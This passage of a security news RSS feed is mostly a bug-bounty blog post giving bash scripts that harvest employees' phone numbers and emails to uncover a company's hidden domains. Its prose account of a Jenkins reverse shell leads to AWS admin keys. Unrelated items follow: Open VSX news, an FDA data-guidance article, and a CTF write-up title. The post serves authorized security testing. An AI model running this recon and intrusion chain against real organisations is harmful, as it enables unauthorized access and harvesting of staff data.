sales.helpdesk.com<br><br># These are subdomains of the support portal domain<br># Check if they resolve, check for takeovers<br><br># Also check: support@company.com → Zendesk, Freshdesk, Helpscout<br># Zendesk: company.zendesk.com<br># Freshdesk: company.freshdesk.com<br># Helpscout: company.helpscout.net</pre><h3>Technique 4: Email Header Subdomain Discovery</h3><p>If you can obtain a legitimate email from the company (e.g., by signing up for their newsletter), the email headers reveal internal infrastructure:</p><pre>Received: from mail.healthtech.com (192.168.1.10)<br>Received: from mx1.healthtech.com (203.0.113.5)<br>Received: from smtp-in.healthtech.com (198.51.100.20)<br>DKIM-Signature: d=healthtech.com; s=selector1<br>Authentication-Results: mx.google.com;<br>       spf=pass (google.com: domain of newsletter@healthtech.com designates 203.0.113.5 as permitted sender)</pre><p>Each of these IPs and hostnames is a potential subdomain:</p><ul><li>mail.healthtech.com</li><li>mx1.healthtech.com</li><li>smtp-in.healthtech.com</li></ul><h3>Real-World Example: Phone + Email → Subdomain Discovery</h3><p>Target: SaaS company cloudserve.com.</p><p>Phone number from WHOIS: +1 (425) 555-0100 (Seattle area)</p><p>Email from WHOIS: admin@cloudserve.com</p><p>Step 1: WHOIS reverse search on phone number Found 12 domains, including:</p><ul><li>cloudserve.io (known)</li><li>cloudserve-backup.com (unknown — registered 2008)</li><li>cs-legacy.com (unknown — registered 2005)</li></ul><p>Step 2: WHOIS reverse search on email Found 8 more domains:</p><ul><li>cloudserve-status.com (status page — known but useful)</li><li>cloudserve-dev.com (development — not in scope docs)</li></ul><p>Step 3: Emails collected from Hunter.io 1,800 emails. Found devops@cloudserve.com in a GitHub commit.</p><p>Step 4: DevOps email → GitHub repos Found a repo with monitoring.cloudserve.com hardcoded in a config file.</p><p>Step 5: Subdomain enumeration on new domains</p><pre>subfinder -d cloudserve-backup.com -silent<br># Found: admin.cloudserve-backup.com<br># Found: db.cloudserve-backup.com</pre><p>Result: 14 new domains and 47 new subdomains discovered through phone and email OSINT alone. DNS brute-force against the main domain found none of these.</p><h3>Part V: Building the Phone-to-Email-to-Domain Pipeline</h3><p>Here’s a practical automated pipeline that can be used for this workflow.</p><h3>Phase 1: Phone Number Collection &amp; Analysis</h3><pre>#!/bin/bash<br># phase1-phone-collect.sh<br>TARGET="$1"<br>DOMAIN="$2"<br><br>echo "[*] Phase 1: Phone Number Collection"<br><br># 1a. WHOIS extraction<br>whois "$DOMAIN" 2&gt;/dev/null | grep -oP '(\+?\d{1,3}[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}' &gt; phones.txt<br><br># 1b. Web scraping for phone numbers<br>katana -u "https://$DOMAIN" -d 2 -silent | \<br>    grep -oP '(\+?\d{1,3}[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}' &gt;&gt; phones.txt<br><br># 1c. Business directories<br>curl -s "https://api.opencorporates.com/v0.4/companies/search?q=$DOMAIN" | \<br>    jq -r '.results[].company.phone_number' 2&gt;/dev/null | grep -v null &gt;&gt; phones.txt<br><br># Deduplicate<br>sort -u phones.txt -o phones.txt<br>echo "[*] Found $(wc -l &lt; phones.txt) unique phone numbers"</pre><h3>Phase 2: Phone → Domain Mapping</h3><pre>#!/bin/bash<br># phase2-phone-to-domain.sh<br>TARGET="$1"<br><br>echo "[*] Phase 2: Phone to Domain Mapping"<br><br>while read PHONE; do<br>    echo "[*] Processing phone: $PHONE"<br>    <br>    # 2a. Reverse WHOIS by phone (if you have access)<br>    # DomainTools API<br>    # curl -s "https://api.domaintools.com/v1/$PHONE/domains/" -u "$USER:$KEY" | \<br>    #     jq -r '.response.domains[]' &gt;&gt; phone-domains.txt<br>    <br>    # 2b. SecurityTrails (manual or API)<br>    # curl -s "https://api.securitytrails.com/v1/search?query=whois.phone:$PHONE" \<br>    #     -H "APIKEY: $ST_KEY" | jq -r '.records[].hostname' &gt;&gt; phone-domains.txt<br>    <br>    # 2c. Breach data (authorized)<br>    # dehashed API<br>    # curl -s "https://api.dehashed.com/v1/search?query=phone:$PHONE" \<br>    #     -u "$EMAIL:$DEHASHED_KEY" | jq -r '.entries[].domain' &gt;&gt; phone-domains.txt<br>    <br>    sleep 1<br>done &lt; phones.txt<br><br>sort -u phone-domains.txt -o phone-domains.txt<br>echo "[*] Found $(wc -l &lt; phone-domains.txt) domains from phone numbers"</pre><h3>Phase 3: Email Collection</h3><pre>#!/bin/bash<br># phase3-email-collect.sh<br>DOMAIN="$1"<br><br>echo "[*] Phase 3: Email Collection"<br><br># 3a. Hunter.io<br>curl -s "https://api.hunter.io/v2/domain-search?domain=$DOMAIN&amp;api_key=$HUNTER_KEY" | \<br>    jq -r '.data.emails[].value' &gt; emails-hunter.txt<br><br># 3b. theHarvester<br>theHarvester -d "$DOMAIN" -b google,linkedin,github -f /dev/null 2&gt;/dev/null | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@'"$DOMAIN" &gt; emails-harvester.txt<br><br># 3c. Skymem<br>curl -s "https://www.skymem.info/srch?q=$DOMAIN" | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]*\.?'"$DOMAIN" &gt; emails-skymem.txt<br><br># 3d. Web page extraction<br>katana -u "https://$DOMAIN" -d 2 -silent | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]*\.?'"$DOMAIN" &gt; emails-web.txt<br><br># 3e. JS file extraction<br>katana -u "https://$DOMAIN" -jc -silent | xargs -I{} curl -s {} 2&gt;/dev/null | \<br>    grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]*\.?'"$DOMAIN" &gt; emails-js.txt<br><br># Combine<br>cat emails-hunter.txt emails-harvester.txt emails-skymem.txt emails-web.txt emails-js.txt | \<br>    sort -u &gt; emails.txt<br><br>echo "[*] Found $(wc -l &lt; emails.txt) unique email addresses"</pre><h3>Phase 4: Email → Domain Extraction</h3><pre>#!/bin/bash<br># phase4-email-to-domain.sh<br>DOMAIN="$1"<br><br>echo "[*] Phase 4: Email to Domain Extraction"<br><br># 4a. Extract all domains from email addresses<br>grep -oP '@[a-zA-Z0-9.-]+' emails.txt | sed 's/@//' | sort -u &gt; email-domains.txt<br><br># 4b. Remove the main domain (keep only non-obvious domains)<br>grep -v "$DOMAIN" email-domains.txt &gt; other-domains.txt<br><br>echo "[*] Found $(wc -l &lt; email-domains.txt) total domains from emails"<br>echo "[*] Found $(wc -l &lt; other-domains.txt) domains OUTSIDE the main domain"</pre><h3>Phase 5: LinkedIn → Name → Email → Domain</h3><pre>#!/bin/bash<br># phase5-linkedin-to-domains.sh<br>TARGET="$1"<br>DOMAIN="$2"<br><br>echo "[*] Phase 5: LinkedIn Name to Email to Domain"<br><br># 5a. Scrape LinkedIn for employees (manual or with tool)<br># linkedin_scraper -c "$TARGET" -o linkedin-employees.csv<br><br># 5b. Extract past companies from LinkedIn profiles<br># awk -F, '{print $3}' linkedin-employees.csv | sort -u &gt; past-companies.txt<br><br># 5c. For each past company, check if it's in scope<br>while read COMPANY; do<br>    echo "[*] Checking past company: $COMPANY"<br>    <br>    # Search for the company's domain<br>    domain_from_name=$(echo "$COMPANY" | tr '[:upper:]' '[:lower:]' | sed 's/ //g').com<br>    nslookup "$domain_from_name" &gt; /dev/null 2&gt;&amp;1 &amp;&amp; echo "$domain_from_name" &gt;&gt; past-company-domains.txt<br>    <br>done &lt; past-companies.txt<br><br># 5d. For each past company domain, check if acquired by target<br># Manual step: verify acquisition history</pre><h3>Phase 6: Cross-Reference and Subdomain Enumeration on New Domains</h3><pre>#!/bin/bash<br># phase6-subdomain-enum.sh<br>DOMAIN="$1"<br><br>echo "[*] Phase 6: Subdomain Enumeration on All Discovered Domains"<br><br># Combine all domain lists<br>cat phone-domains.txt other-domains.txt past-company-domains.txt | sort -u &gt; all-discovered-domains.txt<br><br># Run subdomain enumeration on each<br>while read DISCOVERED_DOMAIN; do<br>    echo "[*] Enumerating: $DISCOVERED_DOMAIN"<br>    <br>    # CT logs<br>    curl -s "https://crt.sh/?q=%25.$DISCOVERED_DOMAIN&amp;output=json" | \<br>        jq -r '.[].name_value' 2&gt;/dev/null &gt;&gt; all-subs.txt<br>    <br>    # Subfinder<br>    subfinder -d "$DISCOVERED_DOMAIN" -silent &gt;&gt; all-subs.txt<br>    <br>    # DNS brute-force<br>    puredns bruteforce ~/wordlists/subdomains.txt "$DISCOVERED_DOMAIN" \<br>        -r ~/resolvers.txt -q &gt;&gt; all-subs.txt<br>    <br>done &lt; all-discovered-domains.txt<br><br>sort -u all-subs.txt -o all-subs.txt<br>echo "[*] Total subdomains discovered: $(wc -l &lt; all-subs.txt)"</pre><h3>Part VI: The Complete Real-World Workflow</h3><p>To understand how this methodology works in practice, let's walk through an anonymized example of how phone numbers, emails, and public intelligence can reveal hidden assets. payflow.com</p><h3>08:00 — Phone Collection</h3><pre># WHOIS<br>whois payflow.com | grep -E "Phone|Tel"<br># +1 (415) 555-0100<br><br># Contact page<br>katana -u https://payflow.com/contact -d 1 | grep -oP '(\+?\d{1,3}[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}'<br># +1 (415) 555-0100 (same)<br># +1 (512) 555-0200 (different — Austin)<br><br># Business registry<br>curl -s "https://api.opencorporates.com/v0.4/companies/search?q=payflow" | \<br>    jq -r '.results[].company.phone_number'<br># +1 (512) 555-0200<br># +1 (512) 555-0300 (NEW — unknown)</pre><p>Phone numbers collected:</p><ul><li>+1 (415) 555-0100 (San Francisco — HQ)</li><li>+1 (512) 555-0200 (Austin — known office)</li><li>+1 (512) 555-0300 (Austin — UNKNOWN)</li></ul><h3>08:30 — Phone → Domain</h3><pre># SecurityTrails reverse WHOIS by phone<br># +1 (512) 555-0300 → registered to:<br># payflow-holdings.com<br># payflow-ventures.com<br># pf-internal.com</pre><p>New domains discovered:</p><ul><li>payflow-holdings.com — Holding company</li><li>payflow-ventures.com — Venture arm</li><li>pf-internal.com — INTERNAL DOMAIN</li></ul><h3>09:00 — Email Collection</h3><pre># Hunter.io: 847 emails<br># theHarvester: 312 emails<br># Skymem: 1,204 emails<br># Web scraping: 89 emails<br># JS files: 34 emails<br># Total unique: 1,892 emails</pre><h3>09:30 — Email → Domain Extraction</h3><pre>grep -oP '@[a-zA-Z0-9.-]+' emails.txt | sed 's/@//' | sort -u<br><br># Unique domains found in emails (excluding payflow.com):<br># payflow.io (known)<br># payflow.co (NEW)<br># payflow-engineering.com (NEW — engineering team domain)<br># pf-payments.com (NEW — payments processing domain)<br># payflow-benefits.com (NEW — HR/benefits domain)</pre><h3>10:00 — GitHub Cross-Reference</h3><pre># Searched for devops@payflow.com on GitHub<br># Found GitHub user: payflow-devops<br># Scanned repos for domain references<br><br># Found in deploy configs:<br># monitoring.internal.payflow.com<br># logs.internal.payflow.com<br># ci.internal.payflow.com</pre><h3>10:30 — Subdomain Enumeration on New Domains</h3><pre># On pf-internal.com:<br>subfinder -d pf-internal.com -silent<br># vpn.pf-internal.com (LIVE)<br># jenkins.pf-internal.com (LIVE)<br># git.pf-internal.com (LIVE)<br><br># On payflow-engineering.com:<br>subfinder -d payflow-engineering.com -silent<br># dev.payflow-engineering.com (LIVE)<br># staging.payflow-engineering.com (LIVE)<br># api.payflow-engineering.com (LIVE)</pre><h3>11:00 — Priority Assessment</h3><p>P0:</p><ol><li>vpn.pf-internal.com — VPN portal (potential credential access)</li><li>jenkins.pf-internal.com — Jenkins (potential RCE)</li><li>pf-internal.com — Internal domain (potential for more discovery)</li></ol><p>P1: 4. payflow-engineering.com — Engineering domain (dev/staging instances) 5. payflow-holdings.com — Holding company (potential subsidiary assets) 6. monitoring.internal.payflow.com — Monitoring (potential Grafana/Prometheus)</p><h3>11:30 — Attack Phase</h3><p>Jenkins on pf-internal.com:</p><ul><li>No authentication required</li><li>Created a freestyle project with a reverse shell</li><li>Got shell access to the Jenkins server</li><li>Jenkins had AWS keys in environment variables</li><li>AWS keys had full admin access to production</li></ul><p>Chain: 1 phone number → 3 unknown phone numbers → 1 unknown domain → 3 subdomains → 1 Jenkins server → AWS root access.</p><h3>Part VII: Tool Reference Guide</h3><h4>Phone Number Tools</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/735/1*XnmWQ7exrxpOTsRHnIQ2qw.png"><figcaption>Phone Number Tools</figcaption></figure><h4>Email Collection Tools</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/738/1*z4tA68XnkqGoK0X9Ey7C3A.png"><figcaption>Email Collection Tools</figcaption></figure><h4>Cross-Reference Tools</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/716/1*IheT9-nPyVGeBaBpR9-gaQ.png"><figcaption>Cross-Reference Tools</figcaption></figure><h3>Part VIII: Common Mistakes (From Personal Experience)</h3><h3>Mistake 1: Not Checking All Phone Numbers from WHOIS</h3><p>A common mistake is finding one phone number in WHOIS and stopping too early, ran my reverse search, and stopped. There were actually three different phone numbers across different domains — I missed two.</p><p>Fix: Extract EVERY phone number from EVERY WHOIS record for EVERY domain you find.</p><h3>Mistake 2: Ignoring Email Domains That Don’t Match the Target</h3><p>What happened: I collected 2,000 emails for target.com. I filtered out everything that wasn't @target.com. I missed the 200 emails with @target-engineering.com, @target-holdings.com, and @target-benefits.com — all of which were owned by the same company.</p><p>Fix: Extract ALL unique domains from your email collection, not just the primary domain.</p><h3>Mistake 3: Not Checking LinkedIn Past Companies</h3><p>What happened: An employee’s LinkedIn profile showed they previously worked at acme-solutions.com. I ignored it. Acme Solutions had been acquired by my target three years prior. Its infrastructure was in scope but I never checked it.</p><p>Fix: Scrape past companies from LinkedIn profiles and cross-reference with acquisition history.</p><h3>Mistake 4: Not Running Subdomain Enumeration on Each New Domain</h3><p>What happened: I found pf-internal.com and added it to my list. I didn't run subfinder or CT log queries against it. vpn.pf-internal.com was sitting there the whole time.</p><p>Fix: Run full subdomain enumeration on EVERY domain you discover, no exceptions.</p><h3>Mistake 5: Stopping After One Round</h3><p>What happened: I discovered new domains, ran subfinder once, and started attacking. I didn’t recurse. Some of those new domains had their own subdomains, and those subdomains had their own CT logs.</p><p>Fix: Recursive enumeration. Every new domain → full acquisition pipeline → find more domains → repeat.</p><h3>Bug Hunter Acquisition Checklist — Phone &amp; Email Edition</h3><h3>☐ Phone Number Collection</h3><ul><li>☐ WHOIS records extracted for all discovered domains</li><li>☐ Contact/scraped pages (main site, subdomains, subsidiaries)</li><li>☐ Business registries checked (OpenCorporates, state registries)</li><li>☐ SEC filings reviewed (10-K, 10-Q, S-1)</li><li>☐ Press releases and news articles mined</li><li>☐ Social media profiles checked (LinkedIn, Twitter, Facebook)</li><li>☐ Breach data queried (with authorization)</li></ul><h3>☐ Phone Number Analysis</h3><ul><li>☐ VOIP provider identified for each number</li><li>☐ Area codes mapped to physical office locations</li><li>☐ Multi-number comparison for organizational structure</li><li>☐ Extension patterns identified</li><li>☐ Reverse WHOIS by phone number completed</li><li>☐ Business registry search by phone completed</li><li>☐ Phone number range scanning (if applicable)</li></ul><h3>☐ Phone → Domain Mapping</h3><ul><li>☐ Reverse WHOIS for every unique phone number</li><li>☐ Business registry domain mapping</li><li>☐ Carrier/VOIP provider infrastructure checked</li><li>☐ Support portal domains discovered (Zendesk, Freshdesk, etc.)</li><li>☐ VOIP admin console exposure checked</li><li>☐ Webhook endpoint testing (if Twilio/RingCentral identified)</li></ul><h3>☐ Email Collection</h3><ul><li>☐ Hunter.io domain search completed</li><li>☐ theHarvester multi-source harvest completed</li><li>☐ Skymem cross-reference completed</li><li>☐ Web page email extraction completed</li><li>☐ JavaScript file email extraction completed</li><li>☐ LinkedIn employee name scraping completed</li><li>☐ GitHub commit email extraction completed</li><li>☐ Mailing list/public forum extraction completed</li><li>☐ Breach data email extraction (with authorization)</li></ul><h3>☐ Email → Domain Extraction</h3><ul><li>☐ All unique domains extracted from email addresses</li><li>☐ Primary domain filtered out to reveal hidden domains</li><li>☐ Subsidiary/acquired company domains identified</li><li>☐ Internal/private domains identified</li><li>☐ Third-party service domains identified</li><li>☐ Employee personal domains identified</li></ul><h3>☐ Email → GitHub → Domain Chain</h3><ul><li>☐ GitHub accounts found for employee emails</li><li>☐ Repos and commits scanned for domain references</li><li>☐ Organization discovery completed</li><li>☐ Config files and environment vars checked</li><li>☐ Hardcoded endpoints extracted</li><li>☐ S3 bucket names and cloud resources extracted</li></ul><h3>☐ Email → Service → Domain Chain</h3><ul><li>☐ Atlassian (Jira/Confluence) instance discovered</li><li>☐ Slack workspace discovered</li><li>☐ Microsoft 365 tenant discovered</li><li>☐ Google Workspace tenant discovered</li><li>☐ Zendesk/Freshdesk/Helpscout portal discovered</li><li>☐ Status page hosted domain discovered</li><li>☐ Documentation/wiki hosted domain discovered</li></ul><h3>☐ Full Subdomain Enumeration on New Domains</h3><ul><li>☐ CT log queries (crt.sh, certspotter) for each new domain</li><li>☐ Passive DNS queries (SecurityTrails, VirusTotal)</li><li>☐ Subdomain brute-force (subfinder, puredns, massdns)</li><li>☐ Permutation-based discovery (alterx, gotator, dmut)</li><li>☐ Recursive enumeration (each subdomain → parent as new target)</li><li>☐ Wayback Machine historical subdomain discovery</li><li>☐ Technology fingerprinting (httpx, whatweb)</li><li>☐ HTTP response analysis (live vs. dead, redirects, error pages)</li></ul><h3>☐ Cross-Reference Validation</h3><ul><li>☐ Phone numbers matched to discovered domains</li><li>☐ Emails matched to discovered domains</li><li>☐ LinkedIn past companies cross-referenced with acquisitions</li><li>☐ GitHub profiles cross-referenced with company email domains</li><li>☐ Breach data cross-referenced (correlates emails, phones, domains)</li><li>☐ Scope validation for every newly discovered asset</li></ul><h3>☐ Continuous Monitoring</h3><ul><li>☐ Daily CT log monitoring for new subdomains on discovered domains</li><li>☐ Weekly phone number re-check (new WHOIS entries)</li><li>☐ Weekly email re-harvesting (new employees, new domains)</li><li>☐ GitHub monitoring for new employee commits</li><li>☐ Acquisition news monitoring (Google Alerts, Crunchbase)</li><li>☐ LinkedIn employee movement tracking</li><li>☐ Quarterly full pipeline re-run</li></ul><h3>Final Technical Notes</h3><h3>Why This Works at Scale</h3><p>The average Fortune 500 company has:</p><ul><li>50–200 registered domains</li><li>10–50 subsidiaries/acquired entities</li><li>2,000–20,000 employees</li><li>5–20 different phone numbers</li></ul><p>DNS brute-force will find maybe 30–50% of the subdomains on the main domain. It will find almost none of the subdomains on other domains.</p><p>Phone and email OSINT finds the other domains. Then you run DNS brute-force on those. The result is a 3–5x increase in discovered attack surface.</p><h3>The Data Flow</h3><pre>Phone Number → Reverse WHOIS → New Domains<br>Phone Number → Business Registry → Legal Entities → New Domains<br>Phone Number → VOIP Provider → Admin Console → Subdomains<br><br>Email Address → Hunter.io → Cross-Company Domains<br>Email Address → GitHub → Repos → Configs → Domains<br>Email Address → Breach Data → Service Registrations → Domains<br>Email Address → LinkedIn → Past Companies → Acquired Domains<br><br>New Domains → Subdomain Enumeration → Attack Surface</pre><h3>A Final Word on Authorization</h3><p>Everything in this blog assumes you have explicit written authorization to test the target’s assets. I do not share the names of actual targets. All examples are anonymized composites of real engagements.</p><p>If you’re new to bug bounty:</p><ol><li>Start with public programs on HackerOne/Bugcrowd that explicitly allow OSINT</li><li>Never use breach data unless the program explicitly permits it</li><li>Never use social engineering unless the program explicitly permits it</li><li>When in doubt, ask the program’s security team</li></ol><p>Disclaimer: Only for authorized bug bounty / pentesting environments.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*o-3pvh96SZd-YMZS.png"><figcaption>Follow US</figcaption></figure><p><em>GitHub: </em><a href="https://github.com/SecurityTalent"><em>SecurityTalent</em></a><em> | Medium: </em><a href="https://medium.com/@securitytalent"><em>Security Talent</em></a><em> | Twitter: </em><a href="https://twitter.com/Securi3yTalent"><em>Securi3yTalent</em></a><em> </em>| Facebook: <a href="https://www.facebook.com/Securi3ytalent/">Securi3ytalent</a> | Telegram: <a href="https://t.me/Securi3yTalent">Securi3yTalent</a></p><p>#BugBounty #OSINT #CyberSecurity #EthicalHacking #Infosec #PenetrationTesting #AttackSurface #SubdomainEnumeration #ThreatHunting #SecurityResearch #RedTeam #DigitalFootprint #CyberSecurity #BugBounty #BugBountyHunter #EthicalHacking #InfoSec #WebSecurity #ApplicationSecurity #AppSec #CloudSecurity #FrontendSecurity #WebDevelopment #JavaScript #ReactJS #Laravel #NodeJS #DevSecOps #OWASP #SecretsManagement #GitHub #GitHubDorks #SourceMaps #EnvFiles #SecurityResearch #PenetrationTesting #RedTeam #BlueTeam #CloudComputing #AWS #Azure #GoogleCloud #VibeCoding #AI #SecureCoding #DeveloperSecurity #TechBlog #Programming</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=16b1e7d533cd" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/phone-numbers-and-emails-to-hidden-subdomains-the-osint-acquisition-pipeline-that-uncovered-a-16b1e7d533cd">Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Eclipse-Alternative zu Microsofts Marketplace: Open VSX 1.0 erschienen]]></title>
<description><![CDATA[Die Eclipse Foundation bietet die Registry für Visual Studio Code Extensions als offene Alternative zu Microsofts Visual Studio Marketplace an.]]></description>
<link>https://tsecurity.de/de/3610017/it-nachrichten/eclipse-alternative-zu-microsofts-marketplace-open-vsx-10-erschienen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610017/it-nachrichten/eclipse-alternative-zu-microsofts-marketplace-open-vsx-10-erschienen/</guid>
<pubDate>Fri, 19 Jun 2026 12:18:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Eclipse Foundation bietet die Registry für Visual Studio Code Extensions als offene Alternative zu Microsofts Visual Studio Marketplace an.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why the FDA’s new real-world evidence guidance ends the era of structured-data-only submissions]]></title>
<description><![CDATA[On February 17, 2026, the FDA’s final guidance on the use of real-world evidence to support regulatory decision-making for medical devices became operational. It asks sponsors to demonstrate that their real-world data is relevant, reliable, complete and traceable, for every clinical fact rather t...]]></description>
<link>https://tsecurity.de/de/3609971/it-security-nachrichten/why-the-fdas-new-real-world-evidence-guidance-ends-the-era-of-structured-data-only-submissions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609971/it-security-nachrichten/why-the-fdas-new-real-world-evidence-guidance-ends-the-era-of-structured-data-only-submissions/</guid>
<pubDate>Fri, 19 Jun 2026 12:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>On February 17, 2026, the FDA’s <a href="https://www.fda.gov/regulatory-information/search-fda-guidance-documents/use-real-world-evidence-support-regulatory-decision-making-medical-devices" rel="nofollow">final guidance on the use of real-world evidence to support regulatory decision-making for medical devices</a> became operational. It asks sponsors to demonstrate that their real-world data is relevant, reliable, complete and traceable, for every clinical fact rather than each dataset as a whole. The first wave of submissions under the new rules is now landing at the agency, and a structural problem with how most secondary-use clinical data is built today is about to become visible.</p>



<p>The premise behind those pipelines is that structured electronic health record (EHR) fields plus claims data offer a defensible foundation for evidence. They are easier to extract and standardize, and map cleanly to common data models like OMOP. The implicit assumption is that what is missing from the structured fields is either marginal or available somewhere else. The peer-reviewed record says otherwise.</p>



<h2 class="wp-block-heading">The clinical signal that matters lives in text</h2>



<p>Across condition areas where regulatory submissions depend on completeness, structured fields capture a small fraction of what clinicians have documented.</p>



<p>Social determinants of health are the starkest case. A <a href="https://www.nature.com/articles/s41746-023-00970-0" rel="nofollow">2024 study in <em>npj Digital Medicine</em></a> compared natural language processing on clinical notes against ICD-10 Z-codes for the same patients: NLP identified adverse SDoH in 93.8% of patients, while the structured codes identified 2.0%. For a regulatory question about outcomes by housing, food or transportation security, structured data is not a partial view. It is absent.</p>



<p>Family history follows a similar shape. <a href="https://pmc.ncbi.nlm.nih.gov/articles/PMC4765557/" rel="nofollow">A 2015 study in the <em>AMIA Annual Symposium Proceedings</em></a> found specified family history in 58.7% of neurology admission notes against 5.2% in the structured record, a twelvefold gap. Any genetics-aware risk model that draws only from structured fields operates without most of its predictive signal.</p>



<p>In oncology, the data that drives staging, therapy and outcomes lives in pathology reports and clinic notes rather than discrete fields. <a href="https://www.jmir.org/2022/3/e27210" rel="nofollow">A 2022 study in the <em>Journal of Medical Internet Research</em></a> reported 93.5–97.6% accuracy for cancer site and histology extracted directly from free-text pathology reports. Without that extraction, the structured oncology record is, on its own, incomplete enough that cancer registry and external-control-arm work cannot be defended.</p>



<p>For diagnoses more generally, <a href="https://www.sciencedirect.com/science/article/pii/S1386505621000782" rel="nofollow">a 2021 audit in the <em>International Journal of Medical Informatics</em></a> found that nearly 40% of important inpatient diagnoses appeared only in free-text notes and never reached the structured problem list. <a href="https://www.johnsnowlabs.com/wp-content/uploads/2025/06/PHuSE_2025_MOSAIC-NLP_Poster.pdf" rel="nofollow">A 2025 study presented at the PHUSE/FDA Computational Science Symposium</a> reported that observed suicidality and self-harm events doubled once unstructured EHR data was added to the surveillance window. This is consistent with <a href="https://pmc.ncbi.nlm.nih.gov/articles/PMC5943451/" rel="nofollow">earlier work</a> showing that only about 3% of suicidal ideation events and 19% of suicide-attempt events documented in notes carry corresponding ICD codes. For pharmacovigilance and safety analyses, the gap is the difference between detecting a signal and missing it.</p>



<h2 class="wp-block-heading">And what is captured is noisier than it looks</h2>



<p>Treating the structured record as ground truth understates a second problem: the codes that are present are frequently wrong. <a href="https://pubmed.ncbi.nlm.nih.gov/29854158/" rel="nofollow">A 2017 simulation study in the <em>AMIA Annual Symposium Proceedings</em></a> found that just over half of entered diagnosis codes were appropriate for the clinical scenario, and about a quarter of the codes expected from the chart were omitted entirely. <a href="https://pubmed.ncbi.nlm.nih.gov/36618791/" rel="nofollow">A 2022 study in the <em>Annals of Translational Medicine</em></a> reported an average of 4.9 medication discrepancies per patient, with more than 90% of patients carrying at least one. And <a href="https://www.cdc.gov/mmwr/volumes/66/wr/mm6645a2.htm" rel="nofollow">the CDC has documented</a> that about one in five new prescriptions is never filled, and roughly half of those filled are taken incorrectly.</p>



<p>The structured layer is not only thin. It is also unreliable in ways that propagate silently into derived measures. This brings the discussion to the most uncomfortable finding.</p>



<h2 class="wp-block-heading">Completeness changes the answer, not just the coverage</h2>



<p><a href="https://www.ajmc.com/view/electronic-health-record-problem-lists-accurate-enough-for-risk-adjustment" rel="nofollow">A 2018 study in the <em>American Journal of Managed Care</em></a> computed <a href="https://pubmed.ncbi.nlm.nih.gov/3558716/" rel="nofollow">Charlson comorbidity scores</a> (a widely used mortality-prediction index) from two sources for the same patients: from free-text clinical notes and from the structured problem list. The version computed from the notes predicted long-term mortality. The version computed from the structured record did not. The math was identical. The data layer changed which conclusions were valid.</p>



<p>This is the pattern the new FDA guidance is responding to. The agency’s relevance-and-reliability framework cares less about volume than about accuracy. The clinical facts in a submission have to accurately represent what happened to the patient, and critical information cannot be systematically missing. A submission whose underlying measure is built on the structured-only Charlson is, by the agency’s own framework, not fit for the regulatory question it is being used to answer.</p>



<h2 class="wp-block-heading">What this means for the architecture, not just the dataset</h2>



<p>The implication runs deeper than “add NLP to your pipeline.” It changes the unit of work. Under the new guidance, the question is no longer “is this dataset complete enough?” but “is this fact about this patient accurate, and where did it come from?” Every clinical assertion in a real-world evidence submission has to be treatable as a claim: sourced, dated, contextualized, scored for confidence and reconcilable when sources disagree.</p>



<p>That has architectural consequences. It means ingesting and parsing every modality losslessly, including text, FHIR, HL7, DICOM and PDFs, without throwing away the original. It means extraction with healthcare-specific language models that handle negation, assertion status, temporality and clinical context. It means terminology mapping that survives audit. It means a reconciliation layer that knows what to do when the chart says 80 mg and the pharmacy feed says 40 mg and surfaces the conflict rather than picking silently.</p>



<p>None of that is exotic engineering. But it is incompatible with pipelines whose first design assumption was that structured fields would carry the load. Sponsors operating under the new guidance will need to rebuild that assumption from the ground up.</p>



<p>Capturing the right data is the easier part. Proving you captured it correctly, fact by fact, is the harder one. The new guidance treats both as requirements, not options.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…]]></title>
<description><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG PlaySlort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080...]]></description>
<link>https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
